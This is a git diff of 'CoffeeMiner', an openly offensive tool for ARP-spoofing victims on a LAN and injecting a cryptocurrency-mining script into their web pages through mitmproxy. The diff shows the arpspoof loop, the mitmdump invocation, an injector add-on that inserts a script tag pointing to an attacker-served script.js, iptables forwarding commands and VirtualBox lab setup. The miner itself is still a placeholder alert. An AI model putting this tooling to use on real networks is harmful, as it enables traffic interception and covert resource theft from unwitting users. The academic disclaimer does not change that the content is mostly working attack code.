diff --git a/README.md b/README.md index 3d685bc..c222e92 100644 --- a/README.md +++ b/README.md @@ -1,12 +1,12 @@ # CoffeeMiner -Collaborative Coffee Mining Pool. +Collaborative (mitm) cryptocurrency mining pool in wifi networks -**Warning: this project is only with academic purposes.** +**Warning: this project is for academic/research purposes only.** ## Concept -- Performs a MITM attack +- Performs a MITM attack to all selected victims - Injects a js script in all the HTML pages requested by the victims - The js script injected contains a cryptocurrency miner - All the devices victims connected to the Lan network, will be mining for the CoffeeMiner @@ -18,53 +18,16 @@ Collaborative Coffee Mining Pool. bash install.sh ``` - edit victims.txt with one IP per line -- run.py +- edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP: +```py +os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T") ``` -python run.py ipgateway +- run.py ``` - - - - ---- - - - -#### Manual use -- needs to have installed **mitmproxy** - https://mitmproxy.org/ - - installation: - ``` - sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev - - pip3 install --user mitmproxy - ``` - -- needs python 3.* - - -- configure IPTABLES - +python3 coffeeMiner.py ipgateway ``` -echo 1 > /proc/sys/net/ipv4/ip_forward -iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/network.png "network") -iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 -iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080 -``` -- arpspoof to the victims -``` -arpspoof -i eth0 -t -arpspoof -i eth0 -t -``` -- execute the httpServer.py that will serve the script.js that contains the minner: -``` -python httpServer.py -``` - -- execute the mitmproxy with the injector.py script: -``` -#~/.local/bin/mitmdump -s "injector.py http://127.0.0.1:8000/script.js" -``` +A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md diff --git a/run.py b/coffeeMiner.py similarity index 87% rename from run.py rename to coffeeMiner.py index 1b1bdbc..8854679 100644 --- a/run.py +++ b/coffeeMiner.py @@ -22,10 +22,10 @@ for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") # start the http server for serving the script.js, in a new console -os.system("xterm -hold -e 'python httpServer.py' &") +os.system("xterm -hold -e 'python3 httpServer.py' &") # start the mitmproxy -os.system("~/.local/bin/mitmdump -s 'injector.py http://127.0.0.1:8000/script.js'") +os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T") ''' diff --git a/injector.py b/injector.py index 6f386b5..1d6057a 100644 --- a/injector.py +++ b/injector.py @@ -2,25 +2,44 @@ # (this script works best with --anticache) from bs4 import BeautifulSoup from mitmproxy import ctx, http - +import argparse class Injector: + ''' def load(self, loader): loader.add_option( "scr_url", str, "", "script_url to inject" ) + ''' + def __init__(self, path): + self.path = path def response(self, flow: http.HTTPFlow) -> None: - if ctx.options.scr_url: + #print("hola hola hola") + #print(self.path) + + if self.path: html = BeautifulSoup(flow.response.content, "html.parser") - if html.body: + print(self.path) + print(flow.response.headers["content-type"]) + if flow.response.headers["content-type"] == 'text/html': + print("uuuuuu") + print(flow.response.headers["content-type"]) + print("asdf asdf asdf asdf asdf") + print("-----") + print("mmmmm") script = html.new_tag( "script", - src=context.src_url, + src=self.path, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html).encode("utf8") - context.log("Script injected.") + print("Script injected.") +def start(): + parser = argparse.ArgumentParser() + parser.add_argument("path", type=str) + args = parser.parse_args() + return Injector(args.path) -addons = [Injector()] +#addons = [Injector()] diff --git a/install.sh b/install.sh index 2ca1e9e..8a4fe1d 100644 --- a/install.sh +++ b/install.sh @@ -1,10 +1,10 @@ #TODO put --yes to all installation commands # install arpspoof (dsniff) -sudo apt-get install dsniff +apt-get -y install dsniff # install mitmproxy -sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev +apt-get -y install python3-dev python3-pip libffi-dev libssl-dev pip3 install --user mitmproxy # install BeautifulSoup diff --git a/miner_script/script.js b/miner_script/script.js index 0c74210..42c71de 100644 --- a/miner_script/script.js +++ b/miner_script/script.js @@ -1 +1 @@ -alert("this will be the minner"); +alert("if you can read this, the script has been injected. This will be the minner"); diff --git a/network.png b/network.png new file mode 100644 index 0000000..d7079e5 Binary files /dev/null and b/network.png differ diff --git a/virtualbox_scenario_instructions.md b/virtualbox_scenario_instructions.md new file mode 100644 index 0000000..29033af --- /dev/null +++ b/virtualbox_scenario_instructions.md @@ -0,0 +1,78 @@ +### Instructions to setup VirtualBox scenario + + +In each machine, remember to setup the dns server, for example, in /etc/resolv.conf: + +``` +nameserver 8.8.8.8 +``` + +### Victim +- network adapter: + - Host-only Adapter +- /etc/network/interfaces: + +``` +auto lo +iface lo inet loopback + +auto eth0 +iface eth0 inet static + address 10.0.2.20 + netmask 255.255.255.0 + gateway 10.0.2.15 +``` + +### Attacker +- network adapter: + - Host-only Adapter +- /etc/network/interfaces: + +``` +auto lo +iface lo inet loopback + +auto eth0 +iface eth0 inet static + address 10.0.2.10 + netmask 255.255.255.0 + gateway 10.0.2.15 +``` + + +### Gateway +- network adapter: + - Bridged Adapter + - Host-only Adapter +- /etc/network/interfaces: + +``` +auto lo +iface lo inet loopback + +auto eth0 +iface eth0 inet dhcp + +auto eth1 +iface eth1 inet static + address 10.0.2.15 + netmask 255.255.255.0 +``` + +Clean IPTABLES: + +``` +iptables --flush +iptables --table nat --flush +``` + +Configure the Gateway machine as a router: + +``` +echo 1 > /proc/sys/net/ipv4/ip_forward + +iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE + +iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT +iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT +```